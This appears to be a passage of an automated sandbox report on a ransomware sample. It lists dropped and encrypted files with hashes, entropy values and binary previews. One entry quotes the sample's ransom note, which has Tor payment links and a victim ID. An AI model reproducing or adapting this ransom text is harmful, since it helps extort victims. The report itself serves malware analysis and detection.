                                                                                                                                                      Preview: ..L...~..w_..;.y....A.h..r./:..V*..Z.0c`...|....,..}............q...D..+.{=.0+.m..j...!F.....b..!,...7.|^Q.f!.....:.O.)...UR......Ut..m..7...".jZ.z..p?.7...s@_..Y...w...J.X.?.....-...u.7.V;.@.v..Z*.n..p..Li.y.:....b.1.q..b.._vx7..p-.:1.GCy.K...f..#.bY.l.S4..V...3o..P..A..M..`......x..>}.f @..V.-..3K.w...........P.=........ufP-....h..W....3V...H.....4n;.^.%......q.MwL.W#.\N.[j.muY3...cZt.~.(.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):50064
                                                                                                                                                      Entropy (8bit):5.156293418554617
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:IMigteWzX1yeocPIgSlHgQWnHhgbvuaU0MX4rnf5Yyp8PesuHRYZEW6NEf1PPv3I:IMaGlyeogW9lrf5Yyp8GoZEHKj/0
                                                                                                                                                      MD5:31DCBA676413F7D07DB227A6775529D6
                                                                                                                                                      SHA1:66701C6255582D82487EBF7C1C065EA101156C90
                                                                                                                                                      SHA-256:652978734F7CD91A1C7E36B50C20CE74FF4E0E776086D8A073B6F3646C0CBB6F
                                                                                                                                                      SHA-512:EE4640CD30A80ACBC6F676CEA6B4321FCDDD024D66B6A5094F42B38F46B9BDE6DFD119C700798E5AE39B8518C0150AEA9FC1D811BBFF87BE9FC896E8D61B14DC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .[W'h..Y..9-U..e....n`E.a..!....=.*..@w.EA..e....,.N.-nG .I...QO..a...U..v.....,G.V>.i.....c...u.]..sb#.[M.$.O5.58.._.g....J..L*...sA...R...!vFZ}8(.A..L| ..Dq.....d...>....>...|Bo..85j.k......tN.\.y...nD._...&@W.=...E.2R\...?..m.....8>.a...A.J.'.RH+..2.Q.n..2..2b...l.....<'j.0.t....q!g...`...<...T...2LA...w.....x....2...9.p/..8....`N.Np...RYr.....1.....#...P._}...&Ytqe}..a.....m..E.d<....v.>.!$..V.t.._..!...D.lj..&a.z@=r+m...N.....|..#...&c.z..y...x.)_=.N.k.bS80....A.J......%.......<...!..n...\..b.v .......:D...dP......e.+....c_....E..c....pLa:..U.. .u..`...".F.~. t~%b...)..8BC..:.Cp.2.....e.u5#......K..,.y."... ..?.V....=b..n\C.@..-....0.Ze...p..Q.m....|.L0.L]......G.=D.?xr..H.5-.S.Q7.&.....~.a..*..2V.=.A...@.{.#....D.%I....+\.....[O......o.9..e.+.u..........w..B.7..9T.x.I.....l...W....*.F.$..~..b70....y...<iS,.B|. .GXihrc\Y.G..<..|J2.$...jP`.vQk.*+.../.._...t..v.~.9........Uy.+!Z...}..Jgx.R...Zg=w>.s..3H.`..."..5.w.V>,.B&..";.;Y....
                                                                                                                                                      C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):123960
                                                                                                                                                      Entropy (8bit):5.27765187901225
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:AMX2EqEPzo9Bk8FMerdSTxzKihbUJzlOPeOBZ5SlYiIY34:ojEPziBDMeZSTNKi55jip34
                                                                                                                                                      MD5:31A1EEAC8CF8DAB793EFE0945AF68B68
                                                                                                                                                      SHA1:46B99B209E71027128839F3806C16B93C1FCE978
                                                                                                                                                      SHA-256:0835ACCA0BCE0494B2904CBF101F95F1B43AB5BD4AE131F34EDA782DA3DE7AEA
                                                                                                                                                      SHA-512:2DAC2765DDF7E6E356D3877DB5C70F0AB79BD8AAFDF87435B43A3974D2C95E30B6B29E2CBC81689C8BF7058259B00EF9FC9934E6D2E86963F269B3C729EBEE5A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..Ny.....f.....';.WUF....O...E...yo.n.8.G.I.si.q.9..bx.fG..H.m..}f.VG6......q.@_t.$(....Z]V...i...c..>...{h.......b.-...y7$%.(..5Q.+:..P ...<W......`.SB..3#.].E.2G.p].e...1.hHD.....=...]..8.=.?Fu.....=n,1}P.9...&........ZR...D...}..:5\M~....NM...2[.m.+.A.A.}....<)..^......z.6.....A...0O.. ..|.)..|.=....]...t...&9.nFEN\........&.p.....a.f.K...5....#..@....>.[.....m.....wSZ]x....qjr..H............Z.A.%V.Za._..\M....`.......@..t+..E....N....^..3...~..D..R.Cpu.L:$.5].{.n.l..1...%..`..Y..us..V..N.rt2.G0......f.8...3_~..2..?....n2.....ip...S....~Uk[..qk...sp.....z...5P.V..}-.....&....x.....L...9<{V[..M"....0|.D.Oj....?^.^..-%..W.j.N.E......S!....2....w.k7.$..7S.9J_.....FXb.m..).h.]....'..0...K.i.4...`s.Ac..L..ey.(.].2.G1....Q.W,M./.;...S.^P2.....9....0q.O.....=.!d`..1.X_...&K.ud.tz..........!.Ze!Rr,a.7i...4@.........'..QM...X..~.....l......Zn.c.x....t.G7Q..Qx{3..9...W.).j@eO......q..2Vo..K.=+.$....>..`...p....651:Uz".r...e....:........
                                                                                                                                                      C:\Users\user\Music\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.4535246602032235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Yw+aVLaPidVffKFXPLh6lOWr9zK8sevWAVgKTaCB7RZ0cHYIgtyUzV3:h+aVaPQxsfFknJzCwgck38m3
                                                                                                                                                      MD5:6D0EA0A15284744A643A91AF1FD1D73C
                                                                                                                                                      SHA1:D6C82D35B23CFF50A24163DB5944F22F93285E1E
                                                                                                                                                      SHA-256:CC3311E4721545A011F480B9DB7142C404026DE9E342FD0039E331E4892C901F
                                                                                                                                                      SHA-512:31499B98E749D1EAF81A752A32AA12196B11CE1E633BD0D86C92A597BAF2CFE9CAEA25DD3034CAD217CC0F6A3409CCAE454F6453CA196E30608176344804220A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: U......W..&...q...;o:.W...e.....a.........T...2E.(YB+j9..sy..............Z.....kVxz.u...q.....h. ..]....C.i....K..d....UZ........iM.L}.hv.R....0...........*.WT."U..uL..n........y.../.g..%......SN...../oE..~.w.O.O...A...Xr....N .\-Pl..4...x..!.s..h.sn.\...&|...I....cuB.......>..+.H'.....8.j.....P.....A.3.wg<....}..|.Kw.....d.as...s............R..../..1.h...S..o.Z..o.(/..F.\C.$...^.p'JJia.t..L#`.\.4.Y....9' .....\y..EA.d....).>..[......#+#./<...J.xC!v..6.'.C.z..Z.......'..d.+.L...~z|.[.O....;.....).k}Y}.[..<....o.r.|NF...;?or./....UGX...R...."!....'.J].8}2...nJ.M.c..?!.PA....mg.K.c."4...t'N!.gb....l..6..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Music\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1456
                                                                                                                                                      Entropy (8bit):6.4535246602032235
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Yw+aVLaPidVffKFXPLh6lOWr9zK8sevWAVgKTaCB7RZ0cHYIgtyUzV3:h+aVaPQxsfFknJzCwgck38m3
                                                                                                                                                      MD5:6D0EA0A15284744A643A91AF1FD1D73C
                                                                                                                                                      SHA1:D6C82D35B23CFF50A24163DB5944F22F93285E1E
                                                                                                                                                      SHA-256:CC3311E4721545A011F480B9DB7142C404026DE9E342FD0039E331E4892C901F
                                                                                                                                                      SHA-512:31499B98E749D1EAF81A752A32AA12196B11CE1E633BD0D86C92A597BAF2CFE9CAEA25DD3034CAD217CC0F6A3409CCAE454F6453CA196E30608176344804220A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: U......W..&...q...;o:.W...e.....a.........T...2E.(YB+j9..sy..............Z.....kVxz.u...q.....h. ..]....C.i....K..d....UZ........iM.L}.hv.R....0...........*.WT."U..uL..n........y.../.g..%......SN...../oE..~.w.O.O...A...Xr....N .\-Pl..4...x..!.s..h.sn.\...&|...I....cuB.......>..+.H'.....8.j.....P.....A.3.wg<....}..|.Kw.....d.as...s............R..../..1.h...S..o.Z..o.(/..F.\C.$...^.p'JJia.t..L#`.\.4.Y....9' .....\y..EA.d....).>..[......#+#./<...J.xC!v..6.'.C.z..Z.......'..d.+.L...~z|.[.O....;.....).k}Y}.[..<....o.r.|NF...;?or./....UGX...R...."!....'.J].8}2...nJ.M.c..?!.PA....mg.K.c."4...t'N!.gb....l..6..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A
                                                                                                                                                      C:\Users\user\Music\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\My Documents\BJZFPPWAPT.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.001651142121543
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:GCxp4Orr3ypCa0k+RZFBmsP9TD11zCwgck38s4:d9VHvm6HzTEZ4
                                                                                                                                                      MD5:D3AECFFDD1B177F19BA4C57821D66B22
                                                                                                                                                      SHA1:8A148213E66F7E5790F9C363F0D8616FF980E3E7
                                                                                                                                                      SHA-256:291CCB44A1BE746C752CCF2FBB10B1377E3D08F318F4A552F333673C66F201A7
                                                                                                                                                      SHA-512:5CAE2A020DE47A7E18CE85193D5EA4DB0ADAAA61B7B683E585441168559DC860426A02558B68C707AA58086C64C441EFD6BE96EA9DA3928EB8C971A76A41ED48
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: X].{t4.=..*..c..^>q........O....<q....rY..b....\.,yT.9.AD..._y.+.Pt..x.L.|..wB..P...kUA.T^...e....,.m.s.E.,..Q..;.Z.Jg/.Fy.y2....y(.k|['@E..P.~.X.G....~.x..0#.k....%.9X6N...G..R...%..T..">j....j9..z%.S..../{.[?.O......=FWV?....Y.$..U...'WR.t..Q[...DN...s........r.>.LV......v..%..;.&D...9x.....g..8.....oa..o.....1..A..*...H.N.^....b.X2..1p.40uL...hh.Ljw.r.b..`.......\.E--..g....9..S.M.Fg~.v......2\..f...*...A...>.K<.......D.O..gu.....is....u`L.H..X'e.n....uTuFK..a`h.8?.b;..i...D|.z.k...6..q...3......g..=...x...Ab.Wr.......m0...-Rc=d3.7.!kG....<.jv.X.n...|..~.n.o!g.Z..B....h...d..U....j...>.R....VC)..:.8^2fI..3RR.Z...*'..W...nC|+.9......F.J..p....C1p....o...b[&."..=Fv.N.....Qz/...c..d.g...L.&1...fc..[h.n.R..-...7l_YU..-.8...r5..Vr.+...@}w4!..+%.F..D.....*.g..n.z}...x..b.3..y.sE.5R...._.4=...0..8B.#......1...e.|....Df7.....E....*....q....wz.....'.5=..w.P|.....h..k..y...u5&...s.{m....u..M...K.?.?...W....I..ay..t......(.E.$.u..H....R..i..R..u.R.
                                                                                                                                                      C:\Users\user\My Documents\EEGWXUHVUG.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.01617953807257
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:GRLNrMyxOTfqGk2nHImEmOh5ztTJJLzCwgck38Xw0:aLNnORpohxJVzTE90
                                                                                                                                                      MD5:520F234949483693F8212A36D87244DB
                                                                                                                                                      SHA1:3310960A26D4FC4130D3A4D2629D08C719FFA334
                                                                                                                                                      SHA-256:43477FAB3699FB239E0FE4FA17A25FB3FC6A7D13C8EA2DA871A4E7C035BEFE76
                                                                                                                                                      SHA-512:FCDA71909E4A6188314EBB423CE22E4D144349DE463BEAB6F8D4BA85F03F1386263AB687536A48D59B1270B977E13639695BBE47D73FA51B3A33E8CF08130EA9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .T.......Y...z...;..1.n...tC..H...B.`...Q..S./E........l\v.......L...{M*.,...-.......O8&..g...jR.f.....4*/..?0...;..;?.xSE...].....F...a8...n.Xt.........{(.&d....... .h..p.....d...>....Dm............[H[3.m./..T...F.P0..>..+W..@..b)....I?..z..V=4..;...wH....<.%.g..-....\.( ..Wr*...{.[$...+.......huPH..'pF...f..C.).~{.5.S..KG...g.AW.o..|:."br.5|.d...d......p.&.a.L........H.^[.u._.f...../...v..Fo....m>C.g<......<1..]..7..fyV....UE.^.X.f.,...[+..M.T.e8.../..!yP..4..z...G+.A...F]J...x............Z.>.."....m..(3..Yb..*.'(..........yj.h.)...$M...[......c.Y.v!.6.....n.?..o..,4#I-.SP.O/......v.."Br..EQ..>.k9x..6.e...~N.^....<XZ..n.*.C."......U.ey.a....."K.p.@..........q.......=...>...g...+/.-{5..M..)...eS........~.,...#.fC&v.t.[T...nR..:.....}p ...>..vEd;...TB//P..5.\aYC.$...g.z.CEIg....iU}...q.^.V....k}0../.p...Of....c1..v.'..N.j=~m.oX.....`RM6......=.6......$.E.`i.....q.".z..m..}@)(-L.+..>.0."....F.n6.....L....!..)m.......;.e...~. .d\.VC'..A..S..Z.
                                                                                                                                                      C:\Users\user\My Documents\EEGWXUHVUG\BJZFPPWAPT.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.029278206698338
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:RoqnmZtXq5ehAUoTF2K0L5yuzCwgck389M:2yehyEK0LtzTEqM
                                                                                                                                                      MD5:3686B5773C72836DC2B3CE747B5F358A
                                                                                                                                                      SHA1:2F4340F63C89EBE642AC2A549BB71DBF3170E308
                                                                                                                                                      SHA-256:D18C747AB8BFEDA3D151F38E0B4C64E3F292CF16972F98CF2144A189036BAD8A
                                                                                                                                                      SHA-512:3E884B9FE85FBB7E22259CFE7E555DCB81D323F73216802FA28FFBB875E5B94871658F448460B0D6CB3011A0C03B6D116B1F2FC97A5A859D22D664065C42BDB6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .....b...56SX..F..........V.|.V^_;.........-...D.3.}....P.........c..BsW.#.`{...{.y..*.j.</5z .nv;.#.N.%....j0..,....8..U<{.d.&..)..f{.;.?.s....H.G...${..?.o.[b..A..A..f6...N.R*.%.*.d.....4.j....y@...j]..=..c..P^.......~..?..=...Y..~.....C..5...N.$)....h.....~.-5.....O._..d........q.(?d........*,..<....2.?s.....".lu.c...."..#..G....o..~../..U...oV.F..z..ooL0...qg]?.$h)|.=G..........."&s.+".vZ.~...?=l......T....'..........(.....3K.JiM........<.... j.v.S...^..I....k&.dyz....=u.......X.]a.f{.2-in8_.SD6....DgO..'....,..Jc.1-.T.XYAr......V~~r...(.....f..w...G...a.qC....".#8.H.xYmN.X{.8.n....L..F.........s..><HY..>40..O...X!."o~3.fPM...Q.;....T.%.1\.%8X.%9.$v.....`G`..B..:...cLj.U..2.....7....$...4.&&.....P..]9W.H.?A.......[I.}..k......=.;....<....F.aY.oe.'g...e...Fw..cn......E.......:...w..60.<.....[.......wD..Xn..T...<.;..3'.4.tE...W.U.Q...c...H..J".P'I..%..|............FM.P....]%6-B...q5..Gx...tr../Xl..H.........J>.g..~.P.V.;..0..(A..!...
                                                                                                                                                      C:\Users\user\My Documents\EEGWXUHVUG\EEGWXUHVUG.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.995335021850847
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:sgFW8eXkV5LTgR353rHuVGMV2BMwqjczxDdxzK8sevWAVgKTaCB7RZ0cHYIgtyUJ:sgleUTPgv7HupIBwcVHzCwgck38E
                                                                                                                                                      MD5:B276736C4BA19836C89ACEF2191C5AEE
                                                                                                                                                      SHA1:AB0FDD67ADCC8564AE2DD8153D4D370153C9F372
                                                                                                                                                      SHA-256:C1650834E7529BDC14CD77662D78014D808E07F066E71F6AFE3764FF31058524
                                                                                                                                                      SHA-512:80CDD274FDD6C916EFE139A08796FC5665B3AE159DEC93AB7F49B528AF8F0211132BB569D3F799F0B828BDF0A1707CE5D82EB14C79BBB3692611AAA930D14DF1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: w/.a.LZ.M.......kI.3=..VN..u..yIH:..T%b....z".o.c....3.w.M.m.u..C.....FG...1..Ik.\..uY.+..7...i...xO...bN.....'.9K.P....RjED.bM......d>'.\..'*sT'..OT8.....[%.....WD.s.\..!...5....[..`7sF.-.,?.....=G.R.H..XT.cTB..%,&.5.ch..N9{...U${.F].S...4..W..f....H.J..3d......O.#...z7.]G.S....|...w&.\ SIVx..&..sh$.5......i.{...L. ....CDuq.t..`.w.....T.5..z....*;.[n.J...!.ZC..62..O.M.U<f..Sd.@>.....[.6E .r.....9....:.y.>..........a.,. =.<...z.....8&..s.....;&...1qS...N.U...P...mv..S.tS.].H.:]..b....=.`........@.....g.D........#.6....l..&0.a....J...5..~.}#.........m.A.0\..x.`2~..r...%U..Q..x...G.BV..6g.....(...E.&{q......-.2Hh#..l.F.X.s.P..l..T1j.(.T.z.f.s...g..v....H.W.....]9.Q..u....9....z..-v.4.f...E7.....^.-k*....s.._yrN+.F./........[...~x..+..if....w+.O..A....@.....*p.B]......2.............K.......;&<....7...._x.....M...'li.6.>..j........ $C.".|9=bf..Ka>....Q.CT.9^i.... f.6....,6...p....}.....5G.o.y....'.......2 . ....m.....(.%.....d.T..
                                                                                                                                                      C:\Users\user\My Documents\EEGWXUHVUG\EFOYFBOLXA.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.996765913791938
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:q0yt70ib/FuJ1kjzCAAdVu4ggGVBE9Ug/zCwgck386:vE/b/Fu4unbu4g1VW9xzTEd
                                                                                                                                                      MD5:4655D4FB82268C496D51A83032FAB4F0
                                                                                                                                                      SHA1:63031F1EFF699FAEAEBDB25FA40D0916F0AF7DCE
                                                                                                                                                      SHA-256:AB2DF1B51B8F18D3A0FA302FC986D1027CDA8AA0EBE0577272BF97D06D396057
                                                                                                                                                      SHA-512:0C0D7FF1EECBBD1C2E9615E72088BE07C18447F19610354ACF0935137EC28281420520929DE7D8D6E9BC7061BEDB0CE949DD12A1C975286829CDE98910E9DC76
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: O.l....,.....X.Sypv*!...../....hM./-.L.... R...... .>...*.z...M.\....AZ.n.....A..|.c}.2.Z.#.s._.38.F.a.5$D|.9............\z..0...$.._g_.......:.3fW.^..P.)..C...Wq.t..o<.5..(...|h.`VE..6G../:@]..c.h.\8\......|..l!C......Ff<.L..Gn........)vu...h...'W..->.R.n....C]..%..m..L....r.:.{..rc.x..;.V.G.yiF.z..U........b..$..s(.bw.d+...W....D.3|..R...`.%:..`..3.....}..E!h..V.=?..2.p...-@5.w. ..B.I.o....c".}.............yk*7.zT..:.:}..G....@^IhS@".&L`.."b.z.........)).."o..v.B,x.......1....^9..>6..k&.38s"....2...!T)......R.<A..Z..j.k...J.2..F...6-..h.d.."...Xt..1)<.s'.;t_M..,...E..h..Zf.a..gD..D%....[T.....M.U..XAt..e..$.%..W?}..!X@.0.r.<m=......0....`....../=a.5.L.E.,h..V.._.:...z.EQ4Jj.J...o......%.........w2\G..5rh.|Mv09.z.6....UO,..T"oYM...V...`).XNK.7Um...!b..3.Z...F...e.......y~..".%.....(g>.....`..7..?l.....k.......f^.d.[..Z.A......... ...#.....M....4...9'S.. .d.4.L/....h..7;c.W8vR.B.OC...e..&.`Z...$.gBO...Sgpl:Q.5....2.1.............}
                                                                                                                                                      C:\Users\user\My Documents\EEGWXUHVUG\PALRGUCVEH.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.017380526919604
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:OpZMiaGRMIh9kIJT1nfQIntetzCwgck389g:OpMgMIh91JThQct4zTEWg
                                                                                                                                                      MD5:778767120CC831D2C321C0D455929245
                                                                                                                                                      SHA1:A7544B99748EEA98E36CBF5B7026C49F577A68AA
                                                                                                                                                      SHA-256:47ACAE91F9FDB4842D273229DE921C59CBEDA5C260667A10924EC680DA329837
                                                                                                                                                      SHA-512:5FB86F5C6B344D957A8A5FE398F2D93C5D16562060E88C87B3E4DB58E08B43535BA449648E20208DA8DEAD59FA7F768EF7B001083999AE5BF88B5E48BE636E3E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: >...n[.4J...!:..n.].,...p...yIx...<.;.t..V@...kT.}'R....;..PQ...d...........U.DA.v/.u..>....AL........r....V.gl..9..:.W..a......r..F.q.J].....?g...D..^;.U.p.e...xE.t...G.@9U..'T(..P.f~k;.!.[88.!.\."..9}?%........9#..K{.....<L..5.?>.<.............p..+[...AY[.1...\.U..xA..~.B.......V4.14....*W..*.K.C..V......d.\.Vpu._)..3.c...1W...{.d.....&.D~m..=........q.@......TY.........;XH9.-.*..i.......".v..=...S.^h}.~..gP...(...%....d4}R...18...vIw.[:.}.X....Rg........|().%....xe......e.;..4..Q...i7.(Ti_(........R..T..@a..G......T.2.....).0.....!.r..p.^...v(.'..<......&.7..\i......VN.LQ_|im...Gx4<..i....sC.3..1.TR.kTm9.[.k.I^.?_....g......./..E.sv.Zy4.w.3H^.J.A"...Ex.jA..{.....*.?..>.-6....S.-|...1....).."..f.C.k..4.7<.2.H9e.;.9Q......o..5S..1k..h.|.)n2.LH..kE.......(..oJ.s.e=..Y ....Ez.h.l.te..;.3A.6.ZVo...%..D....=Z.}.y.:.B..|....J...E.=.9..\....F.....vU}*........r.-9.2.u%.1...V.L..#.$.e>.....zj._D..Xhw...\s..f+..HkaZ;.*....\.q.}l5...nK..z.<
                                                                                                                                                      C:\Users\user\My Documents\EFOYFBOLXA.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.020579471261584
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:lhbS9iqSIF5ac9J5xEMcB2ArMSpEOzCwgck38bABl:Tu9i5IFgc9Jj2eOzTEfL
                                                                                                                                                      MD5:59FBB106CE1F2EBD1165D1924731A0E6
                                                                                                                                                      SHA1:501A6996F39F82A3030740F6B44F1AA4D77EDE4C
                                                                                                                                                      SHA-256:16B26CD00300A4FADE9BF8595B2D793452CE7E455007F719AA9AEDD1CA88A971
                                                                                                                                                      SHA-512:42F32C2318ED5E94053A89A9D0EB51DE4D64878513BEED5DBC46C18D995B3210B4D3874BA4A47FC7F434A10011632B8880CB0DC09A893A245FE5E12FFBCCBB3D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......q...m....r4D.....z.......BH.LUT."...B;...G.gM...o.i.D.t...0.Z.K..m.Y......&.H..VL/.A..&;=..e.~..............Rn.o?... ...xCO.Xl.4..&~..j..pe._mc.,..\.=...9....ME.Q..F8..WL..Qs....Z..........L....X.. ^..^.$`3...7."R...".:..r]=Rz.Q.|...,./..H.....W-.H..IB.. .?...e_BU%..b;U'...~j.......ojcU....N0V1....M.k..i..8..o.r..e....a7.X........v.9+.....W.O.e&....9m..xWr..$L..C.....d..L.Z...../..gT..F.#w~...5}fvu.......i^*.H.V.O.mg{.G...u6Xx.s..yW.Y.r....5..S...b.?1..7..+w7.4".^.T.]...#...g....JUT[...#Y..?....4.c.u9Hw.H........N\..d........#.td}?.*c.#....m.{~.i.....5.Tl.i...W.}.....q..~e6.*...:*8..|.q.b......J...B....`xn.C..S...d.ayr.....9.N..e...$:.]..l~.wSwG..a(US..N.~.d.0X.......N..Sa..1...Rt...u.V5.X.W...'.J..sql.&..Dk.....K.G..7..!..Zh..?..3.....,.....4..a2...>.P\)..FD.24..7...k=......NU...g10.`.t.+.rh.)...6...r.l..Y4.-.jpSrt.Ih.2....1I*.b.f.m..\.?.M.&..jkUT.Y.(b..}....!._:.2.d.}%".f..8..J.C.oP...h...a....BC....[].-q.F{{i$..z=f.N...xX.._
                                                                                                                                                      C:\Users\user\My Documents\EIVQSAOTAQ.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
